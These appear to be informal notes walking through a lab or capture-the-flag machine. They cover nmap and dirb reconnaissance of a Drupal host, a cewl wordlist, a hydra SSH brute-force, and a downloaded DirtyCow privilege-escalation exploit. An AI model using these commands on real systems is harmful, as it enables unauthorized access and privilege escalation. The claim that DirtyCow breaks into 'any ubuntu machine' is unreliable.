-try basic methods of netdiscover
-try basic zenmap to scan network and open ports and services
-nmap -sV -A 192.168.1.106
-try intense scan all tcp ports
-try dirb if dirb fails than server is denying all the connections
-if the installation is drupal
-search for standard Drupal installation
-try to search over the port 1898 for the login
-if nothing works on the login page
-last option is password profiling using the website or may be a blog given.
-use cewl

-cewl will do the password profiling for you no matter what
-cewl http://192.168.1.106:1898/?q=node/1 -w /root/Desktop/list.txt

-now use hydra
-hydra -l tiago -P /root/Desktop/list.txt ssh://192.168.1.106
--https://www.sunnyhoi.com/hack-email-accounts-using-hydra-kali-linux/

-ssh root@192.168.1.106
-to know the os and other details
-cat /etc/issue

-uname -a system hardware and kernel details
-download linux-exploit-suggester github and use it
-wget link
-to exclate preveledges
-chmod 775 linux-exploit-suggester.sh
-after making it executable
-./linux-exploit-suggester.sh
-dirtycow is the ultimate ubuntu exploit to get into any ubuntu machine use dirtycow2
-it is an cpp exploit to first wget it and than compile it link will be into the LES.sh
-use 
-chmod 775 40847.cpp
-use nano
-than follow the instructions to compile the file
-after running
-./dcow
-we will get a new SU password
-cd no argument will take to the home directory